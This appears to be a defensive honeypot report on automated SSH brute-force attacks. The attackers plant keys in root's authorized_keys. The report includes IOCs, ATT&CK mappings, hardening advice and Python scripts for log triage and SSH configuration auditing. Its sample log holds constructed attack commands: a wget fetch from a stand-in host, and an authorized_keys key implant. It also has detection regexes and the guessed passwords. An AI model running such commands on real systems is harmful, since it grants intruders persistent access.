Attack Observation Report

Time and Date of Activity

Start: 2024-07-29 - End: 2024-07-30

Data Source and Methodology

The data analyzed in this report comes from a SANS Internet Storm Center DShield honeypot, which I've set up as part of my internship program. This honeypot is specifically designed to capture and log malicious attempts to breach systems by simulating vulnerable services. Over a 48-hour period, the honeypot recorded detailed logs of various attack attempts, particularly those targeting SSH services. The observations and analyses presented here are based on these logs, processed through the command line and enriched using Cowrie Processor [1]. This setup allows for the monitoring of real-world attack patterns and provides invaluable insights into the tactics used by threat actors.

Executive Summary of the Activity

Over two days, the honeypot was subjected to SSH-based attacks aimed primarily at establishing persistent unauthorized access. The attackers guessed common root passwords to get in, then wrote their own public key into the root account's .ssh/authorized_keys file so that later logins no longer depend on the password. A payload identified as trojan.shell/malkey was downloaded and executed in session after session, indicating a widespread, automated campaign rather than hands-on-keyboard activity.

IP and Account Information Involved

  • Notable IPs:
    • 161.35.71.130 (DigitalOcean, US)
    • 47.76.43.171 (Alibaba, CN)
    • 43.156.239.137 (Tencent, CN)
    • 218.92.0.60 (Chinanet, CN)

Relevant Activity Summary

The attacks targeted the SSH service, and most sessions authenticated as the root user. Attackers cycled through a list of common passwords such as abc@12345678, Qwe@1234, and Lz@123456. Upon a successful login, they modified .ssh/authorized_keys to insert their own public key, which lets them return with key-based authentication even if the password is later changed.

Correlated Activity Over Time

  • Session duration: most sessions lasted between 3 and 20 seconds, which is consistent with scripted activity.
  • Command count: most sessions executed 3 commands; the more elaborate ones ran up to 19.
  • Payloads: the threat actor consistently downloaded the file identified as trojan.shell/malkey, which installs an SSH key to create persistent access.
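The session statistics above and the authorized_keys check described in the activity summary can be derived directly from Cowrie's cowrie.json output. The script below is an added example of mine, not part of the original report or of Cowrie Processor. It assumes Cowrie's JSON event names and fields (eventid, session, src_ip, timestamp, username, password, input, shasum) match the Cowrie version in use; the log lines are constructed for the example, use RFC 5737 test addresses rather than the IPs from this report, and reuse only the report's own SHA-256 indicator.

```python
import json
import re
from collections import defaultdict
from datetime import datetime

# Indicator taken from this report; matched against Cowrie's file_download shasum field.
KNOWN_BAD_SHA256 = {"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2"}

# A write into authorized_keys (redirect, tee, cp/mv over it) or an attempt to lock it down.
KEY_WRITE = re.compile(r"(?:>>?|\btee\b|\bcp\b|\bmv\b)\s*\S*authorized_keys|\bchattr\b.*authorized_keys")
FETCH = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")

# Constructed Cowrie-style events (assumed field names, not real honeypot output).
SAMPLE_LOG = r"""
{"eventid":"cowrie.session.connect","session":"s1","src_ip":"203.0.113.10","timestamp":"2024-07-29T10:00:00.000000Z"}
{"eventid":"cowrie.login.success","session":"s1","src_ip":"203.0.113.10","username":"root","password":"abc@12345678","timestamp":"2024-07-29T10:00:01.000000Z"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"203.0.113.10","input":"uname -a","timestamp":"2024-07-29T10:00:02.000000Z"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"203.0.113.10","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2E attacker\" >> .ssh/authorized_keys && chmod -R go= ~/.ssh","timestamp":"2024-07-29T10:00:03.000000Z"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"203.0.113.10","input":"wget -q http://192.0.2.5/x.sh -O /tmp/x.sh","timestamp":"2024-07-29T10:00:04.000000Z"}
{"eventid":"cowrie.session.file_download","session":"s1","src_ip":"203.0.113.10","url":"http://192.0.2.5/x.sh","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","timestamp":"2024-07-29T10:00:05.000000Z"}
{"eventid":"cowrie.session.closed","session":"s1","src_ip":"203.0.113.10","timestamp":"2024-07-29T10:00:09.000000Z"}
{"eventid":"cowrie.session.connect","session":"s2","src_ip":"198.51.100.7","timestamp":"2024-07-29T11:00:00.000000Z"}
{"eventid":"cowrie.login.failed","session":"s2","src_ip":"198.51.100.7","username":"root","password":"123456","timestamp":"2024-07-29T11:00:01.000000Z"}
{"eventid":"cowrie.session.closed","session":"s2","src_ip":"198.51.100.7","timestamp":"2024-07-29T11:00:02.000000Z"}
"""


def _ts(value):
    # Cowrie timestamps look like 2024-07-29T10:00:01.123456Z
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ")


def triage(lines):
    """Fold cowrie.json events into one record per session: who logged in, how long the
    session ran, how many commands it executed, and whether it planted a key or pulled
    a known payload."""
    sessions = defaultdict(lambda: {"src_ip": None, "login": None, "commands": [],
                                    "downloads": [], "first": None, "last": None})
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        s = sessions[ev["session"]]
        ts = _ts(ev["timestamp"])
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        if ev["eventid"] == "cowrie.login.success":
            s["login"] = (ev["username"], ev["password"])
        elif ev["eventid"] == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif ev["eventid"] == "cowrie.session.file_download":
            s["downloads"].append(ev.get("shasum", ""))

    report = []
    for sid, s in sorted(sessions.items()):
        cmds = s["commands"]
        report.append({
            "session": sid,
            "src_ip": s["src_ip"],
            "login": s["login"],
            "duration_s": (s["last"] - s["first"]).total_seconds(),
            "command_count": len(cmds),
            "key_write": any(KEY_WRITE.search(c) for c in cmds),
            "fetch_cmd": any(FETCH.search(c) for c in cmds),
            "ioc_hit": bool(KNOWN_BAD_SHA256 & set(s["downloads"])),
        })
    return report


if __name__ == "__main__":
    for row in triage(SAMPLE_LOG.splitlines()):
        print(row)
```

Run it against a real file with `triage(open("/srv/cowrie/log/cowrie.json"))`; sessions with `key_write` or `ioc_hit` set are the ones worth pulling the full command transcript for.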

Malware Analysis

  • Payload Name: trojan.shell/malkey
  • Hash: a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 [2]
  • Description: The payload writes an attacker-controlled public key into the SSH authorized_keys file to establish unauthorized access. It was observed in multiple sessions and is classified as a trojan.
  • First Submission: 2018-07-05
  • VirusTotal: 25 engines flag the file as malicious.

Vulnerability Exploitation

  • Exploit: The attacks relied on weak SSH credentials and on a service configuration that permits password authentication for root; no software vulnerability was exploited.
  • CVE: N/A (the weakness is in credentials and SSH configuration, CWE-521 Weak Password Requirements, rather than a specific vulnerability)
  • MITRE ATT&CK:
    • T1110.001: Brute Force: Password Guessing (the common-password attempts against root)
    • T1078.003 [3]: Valid Accounts: Local Accounts (the successful root logins)
    • T1105: Ingress Tool Transfer (the payload download; T1570 [4], Lateral Tool Transfer, covers copying tools between already-compromised hosts and does not fit this activity)
    • T1059.004 [5]: Command and Scripting Interpreter: Unix Shell (commands run inside the SSH session)
    • T1098.004: Account Manipulation: SSH Authorized Keys (the authorized_keys modification)

Goal of the Attack

The threat actor's primary goal was persistent access to the host over SSH: guess the root password once, plant a public key in authorized_keys, and keep a foothold that survives password changes for later use.

Potential Success of the Attack

Given the tactics observed, the attack would succeed against any system that accepts password authentication for root with a guessable password. Once a key sits in .ssh/authorized_keys, the attacker can regain access at any time, and rotating the password does not evict them; the key has to be removed as well.

System Protection Recommendations

  • Enforce Strong Authentication [6]: Use strong, unique passwords, or better, disable password authentication entirely (PasswordAuthentication no in sshd_config) and require keys; consider multi-factor authentication for SSH access.
  • SSH Configuration [7]: Regularly audit sshd_config; set PermitRootLogin no, restrict logins with AllowUsers or AllowGroups, and limit the SSH port to authorized source IPs at the firewall.
  • Monitor SSH Logs [7]: Watch authentication logs for repeated failed logins and for successful logins from unfamiliar sources, and alert on any change to .ssh/authorized_keys (for example, an auditd watch such as `-w /root/.ssh/authorized_keys -p wa -k ssh_keys`, or a file-integrity baseline of every user's authorized_keys).
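The two configuration and monitoring recommendations above as a small audit script, added here as an example of mine and not taken from the DShield or Cowrie tooling. It assumes the sshd_config(5) defaults noted in the code (confirm on your build with `sshd -T`), does not follow Include directives, and expects authorized_keys lines without quoted option strings in front of the key type; both config fragments and both keys are constructed for the example.

```python
import base64
import hashlib

# Directive -> (values considered safe, value sshd assumes when the directive is absent).
# Defaults follow sshd_config(5) for current OpenSSH (assumed; check with `sshd -T`).
CHECKS = {
    "permitrootlogin": ({"no"}, "prohibit-password"),
    "passwordauthentication": ({"no"}, "yes"),
    "kbdinteractiveauthentication": ({"no"}, "yes"),
    "pubkeyauthentication": ({"yes"}, "yes"),
}


def parse_sshd_config(text):
    """Effective top-level directives, keyword lower-cased.

    sshd keeps the FIRST value of a repeated keyword, so a hardening line appended to
    the end of the file is silently ignored if an earlier line already set the keyword.
    Parsing stops at the first Match block; audit those with `sshd -T -C user=...`.
    """
    effective = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        effective.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    return effective


def audit_sshd_config(text):
    """Return a list of human-readable findings; an empty list means all checks passed."""
    eff = parse_sshd_config(text)
    findings = []
    for key, (safe, default) in CHECKS.items():
        value = eff.get(key, default).lower()
        if value not in safe:
            how = "is set to" if key in eff else "is absent and defaults to"
            findings.append(f"{key} {how} '{value}'; want {sorted(safe)}")
    tries = int(eff.get("maxauthtries", "6"))
    if tries > 3:
        findings.append(f"maxauthtries is {tries}; want 3 or fewer")
    if "allowusers" not in eff and "allowgroups" not in eff:
        findings.append("no AllowUsers/AllowGroups allow-list")
    return findings


KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(line):
    """OpenSSH SHA256 fingerprint and comment of one authorized_keys line.
    Assumes the key type is a whitespace-separated token (no quoted options before it)."""
    fields = line.split()
    idx = next(i for i, f in enumerate(fields) if f.startswith(KEY_TYPES))
    blob = base64.b64decode(fields[idx + 1])
    digest = hashlib.sha256(blob).digest()
    comment = " ".join(fields[idx + 2:])
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("="), comment


def unexpected_keys(authorized_keys, allowed):
    """(fingerprint, comment) for every key that is not in the allowed baseline."""
    found = []
    for line in authorized_keys.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fp, comment = fingerprint(line)
        if fp not in allowed:
            found.append((fp, comment))
    return found


def _fake_key(seed, comment):
    # Constructed ed25519-shaped blob, not a real key; only its fingerprint matters here.
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes((seed + i) % 256 for i in range(32))
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


ADMIN_KEY = _fake_key(1, "admin@bastion")
BASELINE = {fingerprint(ADMIN_KEY)[0]}            # fingerprints you expect to see
AUTHORIZED_KEYS = ADMIN_KEY + "\n" + _fake_key(200, "attacker") + "\n"

WEAK_CONFIG = """\
# constructed example, not a real host's config
Port 22
PermitRootLogin yes
#PasswordAuthentication no
MaxAuthTries 6
PermitRootLogin no
"""

HARDENED_CONFIG = """\
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
AllowUsers ops deploy
"""

if __name__ == "__main__":
    print("weak:", audit_sshd_config(WEAK_CONFIG))
    print("hardened:", audit_sshd_config(HARDENED_CONFIG))
    print("unexpected keys:", unexpected_keys(AUTHORIZED_KEYS, BASELINE))
```

The weak fragment shows the trap the first-value-wins rule sets: the `PermitRootLogin no` appended at the bottom never takes effect because `PermitRootLogin yes` appears first, and the commented-out `PasswordAuthentication no` leaves the default of `yes` in force. Seed BASELINE from `ssh-keygen -lf ~/.ssh/authorized_keys` on a known-good host and run `unexpected_keys` on a schedule to catch the implant this report describes.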

Attacker Information

  • Sources: The attacking hosts sit in address space of well-known cloud providers (DigitalOcean, Alibaba, Tencent) and of Chinanet, which is typical of rented or compromised infrastructure used for automated scanning.
  • Threat Intel: The IPs associated with this activity have been flagged in previous incidents involving automated SSH brute-force attacks.

Indicators

  • IP List:
    • 161.35.71.130 (DigitalOcean, US)
    • 43.156.239.137 (Tencent, CN)
    • 47.76.43.171 (Alibaba, CN)
    • 218.92.0.60 (Chinanet, CN)
  • Hashes:
    • a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 (trojan.shell/malkey)

External References
